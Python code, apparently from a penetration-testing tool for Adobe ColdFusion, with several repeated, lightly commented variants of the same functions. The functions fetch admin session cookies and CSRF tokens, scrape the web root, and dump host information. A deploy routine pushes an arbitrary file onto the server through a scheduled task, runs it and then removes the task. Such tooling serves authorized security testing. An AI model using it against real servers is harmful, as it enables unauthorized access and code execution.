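def fetch_csrf(ip, fingerprint, url):
    """Return the session cookie and, where the version uses one, the CSRF token.

    The token is only accepted together with the session it was issued for,
    so the page at ``url`` is requested with the cookie obtained from
    ``checkAuth`` and both values are returned as a pair.

    Args:
        ip: Address of the ColdFusion host.
        fingerprint: Fingerprint object; ``version`` and ``port`` are read.
        url: Page whose HTML carries the hidden ``csrftoken`` field.

    Returns:
        ``(cookie, csrftoken)``. ``csrftoken`` is ``None`` for versions other
        than 9.0/10.0/11.0 and when the page has no token field.  ``False``
        when ``checkAuth`` yields nothing, ``None`` when the page does not
        answer with HTTP 200.
    """
    # `title` is not a parameter; it is read from the enclosing module.
    cookies = checkAuth(ip, fingerprint.port, title, fingerprint.version)
    if not cookies:
        # Checked before any indexing: the original indexed the result
        # directly on the pre-9.0 path, which raises if auth failed.
        utility.Msg("Could not get auth for %s:%s" % (ip, fingerprint.port),
                    LOG.ERROR)
        return False

    if fingerprint.version not in ['9.0', '10.0', '11.0']:
        # versions <= 8.x do not use a CSRF token
        return (cookies[0], None)

    # lets try and fetch CSRF
    response = utility.requests_get(url, cookies=cookies[0])

    # `==`, not `is`: identity comparison on an int only works by accident
    # of CPython's small-integer cache.
    if response.status_code == 200:
        token = findall("name=\"csrftoken\" value=\"(.*?)\">", response.content)
        if len(token) > 0:
            return (cookies[0], token[0])
        utility.Msg("CSRF appears to be disabled.", LOG.DEBUG)
        return (cookies[0], None)

    # Any other status: the original fell off the end of the function.
    return None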
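def fetch_csrf(ip, fingerprint, url):
    """Fetch the session cookie plus the CSRF token bound to that session.

    Args:
        ip: Address of the ColdFusion host.
        fingerprint: Fingerprint object; ``version`` and ``port`` are read.
        url: Page that is scraped for the hidden ``csrftoken`` form field.

    Returns:
        A ``(cookie, csrftoken)`` tuple; the token is ``None`` for versions
        other than 9.0/10.0 or when the field is absent from the page.
        ``False`` if no authenticated session could be obtained, ``None`` if
        the page answers with anything but HTTP 200.
    """
    # `title` comes from module scope, not from the arguments.
    cookies = checkAuth(ip, fingerprint.port, title, fingerprint.version)
    if not cookies:
        # One failure path for every version; the original indexed the
        # checkAuth result unguarded when the version was <= 8.x.
        utility.Msg("Could not get auth for %s:%s" % (ip, fingerprint.port),
                    LOG.ERROR)
        return False

    session_cookie = cookies[0]

    if fingerprint.version not in ['9.0', '10.0']:
        # versions <= 8.x do not use a CSRF token
        return (session_cookie, None)

    # The token must be requested on the same session it will be used with.
    response = utility.requests_get(url, cookies=session_cookie)

    # Compare the status by value; `is 200` depends on interpreter caching.
    if response.status_code != 200:
        return None

    token = findall("name=\"csrftoken\" value=\"(.*?)\">", response.content)
    if len(token) > 0:
        return (session_cookie, token[0])

    utility.Msg("CSRF appears to be disabled.", LOG.DEBUG)
    return (session_cookie, None)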
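def fetch_webroot(ip, fingerprint):
    """Pick out the web root from the settings summary page.

    Args:
        ip: Address of the ColdFusion host.
        fingerprint: Fingerprint object; ``version`` and ``port`` are read.

    Returns:
        The web root path as a string, ``False`` when authentication fails
        or the page holds no matching cell, ``None`` when the page does not
        answer with HTTP 200.
    """
    # The URL is built as plain http, so the session cookie passed below is
    # sent unencrypted unless utility.requests_get does something else.
    url = "http://{0}:{1}/CFIDE/administrator/reports/index.cfm"\
        .format(ip, fingerprint.port)

    # `title` is read from module scope.
    cookies = checkAuth(ip, fingerprint.port, title, fingerprint.version)
    if not cookies:
        utility.Msg("Could not get auth for %s:%s" % (ip, fingerprint.port),
                    LOG.ERROR)
        return False

    req = utility.requests_get(url, cookies=cookies[0])

    # `==`, not `is`: identity on ints is an implementation detail.
    if req.status_code != 200:
        return None

    root_regex = "CFIDE </td><td scope=row class=\"cellRightAndBottomBlueSide\">(.*?)</td>"
    if fingerprint.version in ["7.0"]:
        # The 7.0 page omits the scope attribute on this cell.
        root_regex = root_regex.replace("scope=row ", "")

    data = findall(root_regex, req.content.translate(None, "\n\t\r"))
    if len(data) == 0:
        return False

    # NOTE(review): the page rendering decoded the first argument of both
    # replace() calls, leaving an unparseable line. They are restored here as
    # the hexadecimal character references for backslash and colon --
    # confirm against the original file.
    # The trailing [:-7] drops the last seven characters of the cell,
    # presumably markup that follows the path -- TODO confirm.
    return data[0].replace("&#x5c;", "\\").replace("&#x3a;", ":")[:-7]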
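def run(self, fingerengine, fingerprint):
    """Request the ColdFusion administrator information page.

    Versions 5.0, 6.0 and 6.1 are handed to ``self._run5``.  For every other
    version an authenticated session is obtained through ``checkAuth`` and
    the reports index page (the version page on 7.0) is requested with it.

    The lines shown here end after the request; nothing in this excerpt
    consumes ``response``.

    Args:
        fingerengine: Engine object; ``options.ip`` is read.
        fingerprint: Fingerprint object; ``version``, ``port`` and ``title``
            are read.

    Returns:
        Whatever ``self._run5`` returns for the legacy versions, otherwise
        ``None``.
    """
    if fingerprint.version in ["5.0", "6.0", "6.1"]:
        return self._run5(fingerengine, fingerprint)

    utility.Msg("Attempting to retrieve Coldfusion info...")

    # Built as plain http: the session cookie below travels unencrypted
    # unless utility.requests_get changes the scheme.
    base = "http://{0}:{1}".format(fingerengine.options.ip, fingerprint.port)
    uri = "/CFIDE/administrator/reports/index.cfm"
    if fingerprint.version in ["7.0"]:
        uri = '/CFIDE/administrator/settings/version.cfm'

    cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
                        fingerprint.title, fingerprint.version)
    if not cookies:
        utility.Msg("Could not get auth for %s:%s" %
                    (fingerengine.options.ip, fingerprint.port), LOG.ERROR)
        return
    cookies = cookies[0]

    try:
        response = utility.requests_get(base + uri, cookies=cookies)
    except Exception as e:
        # `as e` replaces the comma form, which newer interpreters reject;
        # the other run() variants on this page already use it.
        utility.Msg("Failed to fetch info: %s" % e, LOG.ERROR)
        return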
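def _run5(self, fingerengine, fingerprint):
    """Print system information scraped from a 5.0/6.0/6.1 version page.

    The administrator version page is fetched with an authenticated session
    and its table cells are paired up as ``key: value`` lines, each emitted
    through ``utility.Msg``.

    Args:
        fingerengine: Engine object; ``options.ip`` is read.
        fingerprint: Fingerprint object; ``version``, ``port`` and ``title``
            are read.

    Returns:
        None.

    Raises:
        IndexError: if a scraped cell does not match the inner pattern
            (the ``[0]`` on the inner ``findall`` results is unguarded).
    """
    utility.Msg("Attempting to retrieve Coldfusion info...")

    # Guard before indexing: other callers on this page test checkAuth's
    # result for falsiness, so `[0]` on it directly can raise.
    auth = checkAuth(fingerengine.options.ip, fingerprint.port,
                     fingerprint.title, fingerprint.version)
    cookies = auth[0] if auth else None
    if not cookies:
        utility.Msg(
            "Could not get auth for %s:%s" %
            (fingerengine.options.ip, fingerprint.port), LOG.ERROR)
        return

    # Built as plain http; the cookie is sent unencrypted unless
    # utility.requests_get changes the scheme.
    base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port)

    # `uri` is only bound for the three versions below; the run() variants
    # on this page dispatch here for exactly those.
    if fingerprint.version in ['5.0']:
        uri = '/CFIDE/administrator/server_settings/version.cfm'
    elif fingerprint.version in ['6.0', '6.1']:
        uri = '/CFIDE/administrator/settings/version.cfm'

    response = utility.requests_get(base + uri, cookies=cookies)

    # Strip line breaks once so the non-greedy patterns can span rows.
    page = response.content.translate(None, '\r\n')

    if fingerprint.version in ['5.0']:
        keys = findall("<td height=\".*?\" nowrap>(.*?)</td>", page)[1:]
        values = findall("<td>(.*?)</td>", page)

        # The first key cell and the first two value cells are skipped.
        for (key, value) in zip(keys, values[2:]):
            k = findall("class=\"text2\">(.*?)</p>", key)[0].replace(" ", '').rstrip()
            v = findall(">(.*?)\t", value)[0].replace(' ', '')
            utility.Msg(" %s: %s" % (k, v))

    elif fingerprint.version in ['6.0', '6.1']:
        keys = findall("<td height=\"18\" nowrap>(.*?)</td>", page)
        values = findall(
            "<td width=\"100%\" class=\"color-row\">(.*?)</td>", page)

        # The last two cells of each list are left out.
        for (key, value) in zip(keys[:-2], values[:-2]):
            k = findall(" (.*?) ", key)[0].lstrip().rstrip()
            v = findall(" (.*?)\t", value)[0].lstrip().rstrip()
            utility.Msg(" %s: %s" % (k, v))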
def run(self, fingerengine, fingerprint):
    """Print ColdFusion host information taken from the administrator pages.

    Versions 5.0, 6.0 and 6.1 are delegated to ``self._run5``.  Otherwise the
    reports index page (the version page on 7.0) is fetched with a session
    from ``checkAuth``, scraped with the pair of patterns returned by
    ``self.versionRegex`` and the first 26 label/value pairs are printed.
    The report holds far more rows; only the leading ones are shown.

    Args:
        fingerengine: Engine object; ``options.ip`` is read.
        fingerprint: Fingerprint object; ``version``, ``port`` and ``title``
            are read.

    Returns:
        The result of ``self._run5`` for legacy versions, otherwise ``None``.
    """
    legacy_versions = ("5.0", "6.0", "6.1")
    if fingerprint.version in legacy_versions:
        return self._run5(fingerengine, fingerprint)

    utility.Msg("Attempting to retrieve Coldfusion info...")

    # The URL is assembled as plain http, so the cookie sent with it is
    # unencrypted unless utility.requests_get changes the scheme.
    base = "http://{0}:{1}".format(fingerengine.options.ip, fingerprint.port)
    if fingerprint.version in ("7.0",):
        uri = '/CFIDE/administrator/settings/version.cfm'
    else:
        uri = "/CFIDE/administrator/reports/index.cfm"

    auth = checkAuth(fingerengine.options.ip, fingerprint.port,
                     fingerprint.title, fingerprint.version)
    if not auth:
        utility.Msg(
            "Could not get auth for %s:%s" %
            (fingerengine.options.ip, fingerprint.port), LOG.ERROR)
        return
    session = auth[0]

    try:
        response = utility.requests_get(base + uri, cookies=session)
    except Exception as e:
        utility.Msg("Failed to fetch info: %s" % e, LOG.ERROR)
        return

    if response.status_code != 200:
        return

    patterns = self.versionRegex(fingerprint.version)

    # Newlines and tabs are removed so each table cell sits on one line.
    flat = response.content.translate(None, "\n\t\r")
    labels = findall(patterns[0], flat)
    values = findall(patterns[1], flat)

    # pad: on these versions the first value has no label cell of its own
    if fingerprint.version in ("8.0", "9.0", "10.0", '11.0'):
        labels.insert(0, "Version")

    # Each value loses its last seven characters before printing,
    # presumably trailing markup -- TODO confirm.
    for (label, value) in zip(labels, values)[:26]:
        utility.Msg(' %s: %s' % (label, value[:-7]))
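def _run5(self, fingerengine, fingerprint):
    """Pull system information from ColdFusion 5.0, 6.0 and 6.1 instances.

    Requests the version page of the administrator interface with an
    authenticated session, pairs the scraped table cells and prints each
    pair through ``utility.Msg``.  The scraping is positional and tied to
    the exact markup of those releases.

    Args:
        fingerengine: Engine object; ``options.ip`` is read.
        fingerprint: Fingerprint object; ``version``, ``port`` and ``title``
            are read.

    Returns:
        None.

    Raises:
        IndexError: when a cell lacks the text the inner pattern expects.
    """
    host = fingerengine.options.ip

    utility.Msg("Attempting to retrieve Coldfusion info...")

    # checkAuth's result is tested for falsiness elsewhere on this page, so
    # it is checked here before its first element is taken.
    auth = checkAuth(host, fingerprint.port, fingerprint.title,
                     fingerprint.version)
    if not auth or not auth[0]:
        utility.Msg("Could not get auth for %s:%s" % (host, fingerprint.port),
                    LOG.ERROR)
        return
    cookies = auth[0]

    # Plain http as built here; the cookie is not protected in transit
    # unless utility.requests_get changes the scheme.
    base = 'http://{0}:{1}'.format(host, fingerprint.port)

    is_v5 = fingerprint.version in ['5.0']
    is_v6 = fingerprint.version in ['6.0', '6.1']

    # Callers on this page only route 5.0/6.0/6.1 here; any other version
    # leaves `uri` unbound, as in the original.
    if is_v5:
        uri = '/CFIDE/administrator/server_settings/version.cfm'
    elif is_v6:
        uri = '/CFIDE/administrator/settings/version.cfm'

    response = utility.requests_get(base + uri, cookies=cookies)

    # Computed once instead of once per pattern.
    body = response.content.translate(None, '\r\n')

    if is_v5:
        keys = findall("<td height=\".*?\" nowrap>(.*?)</td>", body)[1:]
        values = findall("<td>(.*?)</td>", body)

        # Offsets ([1:] above, [2:] here) line the two cell lists up.
        for (key, value) in zip(keys, values[2:]):
            k = findall("class=\"text2\">(.*?)</p>", key)[0].replace(" ", '').rstrip()
            v = findall(">(.*?)\t", value)[0].replace(' ', '')
            utility.Msg(" %s: %s" % (k, v))

    elif is_v6:
        keys = findall("<td height=\"18\" nowrap>(.*?)</td>", body)
        values = findall("<td width=\"100%\" class=\"color-row\">(.*?)</td>",
                         body)

        # The final two cells of both lists are not printed.
        for (key, value) in zip(keys[:-2], values[:-2]):
            k = findall(" (.*?) ", key)[0].lstrip().rstrip()
            v = findall(" (.*?)\t", value)[0].lstrip().rstrip()
            utility.Msg(" %s: %s" % (k, v))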
def run(self, fingerengine, fingerprint):
    """Print ColdFusion host information from the reports index page.

    The page is first requested without a session.  Only when it answers
    with the administrator login form is ``checkAuth`` used to obtain a
    cookie and the request repeated.  The first 26 label/value pairs of the
    report are printed; the remainder is left out as extraneous.

    Args:
        fingerengine: Engine object; ``options.ip`` is read.
        fingerprint: Fingerprint object; ``version``, ``port`` and ``title``
            are read.

    Returns:
        None.
    """
    utility.Msg("Attempting to retrieve Coldfusion info...")

    # Plain http as built here.
    target = ("http://{0}:{1}".format(fingerengine.options.ip, fingerprint.port)
              + "/CFIDE/administrator/reports/index.cfm")

    response = utility.requests_get(target)

    # A 200 without the login marker means the administrator page answered
    # without any session; the report is then read as-is.
    login_shown = (response.status_code == 200 and
                   "ColdFusion Administrator Login" in response.content)
    if login_shown:
        utility.Msg("Host %s:%s requires auth, checking..." %
                    (fingerengine.options.ip, fingerprint.port), LOG.DEBUG)

        auth = checkAuth(fingerengine.options.ip, fingerprint.port,
                         fingerprint.title, fingerprint.version)
        if not auth:
            utility.Msg("Could not get auth for %s:%s" %
                        (fingerengine.options.ip, fingerprint.port), LOG.ERROR)
            return
        response = utility.requests_get(target, cookies=auth[0])

    if response.status_code != 200:
        return

    # Newlines and tabs are dropped so each cell matches on a single line.
    flat = response.content.translate(None, "\n\t\r")
    labels = findall("<td scope=row nowrap class=\"cell3BlueSides\">(.*?)</td>",
                     flat)
    values = findall("<td scope=row class=\"cellRightAndBottomBlueSide\">(.*?)</td>",
                     flat)

    # pad
    labels.insert(0, "Version")

    # The last seven characters of every value are cut before printing,
    # presumably trailing markup -- TODO confirm.
    for (label, value) in zip(labels, values)[:26]:
        utility.Msg(' %s: %s' % (label, value[:-7]))
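def deploy(fingerengine, fingerprint):
    """Scheduled Task deployer for older versions.

    Older releases differ enough from newer ones to warrant a deployer of
    their own.  The steps are: authenticate, look up the web root, create a
    scheduled task for the file named by ``options.deploy``, invoke it, then
    delete the task again.

    Cleanup is best effort: when ``delete_task`` fails the task stays on the
    server and has to be removed by hand, which the last message reports.

    Args:
        fingerengine: Engine object; ``options.deploy`` and ``options.ip``
            are read.
        fingerprint: Fingerprint object; ``version`` and ``port`` are read.

    Returns:
        None.
    """
    cfm_path = abspath(fingerengine.options.deploy)
    cfm_file = parse_war_path(cfm_path, True)
    dip = fingerengine.options.ip

    # `title` is read from module scope.  The result is checked before
    # indexing: other callers on this page test checkAuth's return value
    # for falsiness, so `[0]` on it directly can raise instead of reaching
    # the error message below.
    auth = checkAuth(dip, fingerprint.port, title, fingerprint.version)
    cookie = auth[0] if auth else None
    if not cookie:
        utility.Msg("Could not get auth", LOG.ERROR)
        return

    utility.Msg("Preparing to deploy {0}...".format(cfm_file))
    utility.Msg("Fetching web root...", LOG.DEBUG)

    # This three-argument fetch_webroot is not the two-argument one listed
    # elsewhere on this page -- presumably a helper local to this module.
    root = fetch_webroot(dip, fingerprint, cookie)
    if not root:
        utility.Msg("Unable to fetch web root.", LOG.ERROR)
        return

    # create the scheduled task
    utility.Msg("Web root found at %s" % root, LOG.DEBUG)
    utility.Msg("Creating scheduled task...")

    if not create_task(dip, fingerprint, cfm_file, root, cookie):
        return

    # invoke the task
    utility.Msg("Task %s created, invoking..." % cfm_file)
    run_task(dip, fingerprint, cfm_path, cookie)

    # cleanup
    utility.Msg("Cleaning up...")
    if not delete_task(dip, fingerprint, cfm_file, cookie):
        utility.Msg("Failed to remove task. May require manual removal.",
                    LOG.ERROR)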
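class Auxiliary:
    """Auxiliary module that prints ColdFusion host information.

    ``run`` calls ``self.versionRegex``, which is not among the lines shown
    here -- presumably defined further down in the class.
    """

    def __init__(self):
        # Descriptive fields read by the surrounding framework (not shown).
        self.name = 'Dump host information'
        self.versions = ['7.0', '8.0', '9.0', '10.0']
        self.show = True
        self.flag = 'cf-info'

    def check(self, fingerprint):
        """Return True when the fingerprint is a supported ColdFusion version."""
        return (fingerprint.title == CINTERFACES.CFM and
                fingerprint.version in self.versions)

    def run(self, fingerengine, fingerprint):
        """Print ColdFusion host information from the administrator pages.

        The reports index page (the version page on 7.0) is first requested
        without a session.  Only when the login form comes back is
        ``checkAuth`` used to obtain a cookie and the request repeated.  The
        first 26 label/value pairs are printed; the rest of the report is
        left out as extraneous.

        Args:
            fingerengine: Engine object; ``options.ip`` is read.
            fingerprint: Fingerprint object; ``version``, ``port`` and
                ``title`` are read.

        Returns:
            None.
        """
        utility.Msg("Attempting to retrieve Coldfusion info...")

        # Plain http as built here.
        base = "http://{0}:{1}".format(fingerengine.options.ip,
                                       fingerprint.port)
        uri = "/CFIDE/administrator/reports/index.cfm"
        if fingerprint.version in ["7.0"]:
            uri = '/CFIDE/administrator/settings/version.cfm'

        try:
            response = utility.requests_get(base + uri)
        except Exception as e:
            # `as e` replaces the comma form, which newer interpreters
            # reject as a syntax error.
            utility.Msg("Failed to fetch info: %s" % e, LOG.ERROR)
            return

        # A 200 without the login marker means the page answered without
        # any session; it is then parsed as-is.
        if response.status_code == 200 and \
                "ColdFusion Administrator Login" in response.content:
            utility.Msg(
                "Host %s:%s requires auth, checking..." %
                (fingerengine.options.ip, fingerprint.port), LOG.DEBUG)

            cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
                                fingerprint.title, fingerprint.version)
            if not cookies:
                utility.Msg(
                    "Could not get auth for %s:%s" %
                    (fingerengine.options.ip, fingerprint.port), LOG.ERROR)
                return

            # NOTE(review): unlike the first request, this one is not
            # wrapped in try/except.
            response = utility.requests_get(base + uri, cookies=cookies[0])

        if response.status_code == 200:
            regex = self.versionRegex(fingerprint.version)

            # Strip newlines and tabs once; both patterns use the result.
            flat = response.content.translate(None, "\n\t\r")
            types = findall(regex[0], flat)
            values = findall(regex[1], flat)

            # pad
            if fingerprint.version in ["8.0", "9.0", "10.0"]:
                types.insert(0, "Version")

            # The loop variable no longer rebinds the list it iterates.
            # Each value loses its last seven characters, presumably
            # trailing markup -- TODO confirm.
            for (row, value) in zip(types, values)[:26]:
                utility.Msg(' %s: %s' % (row, value[:-7]))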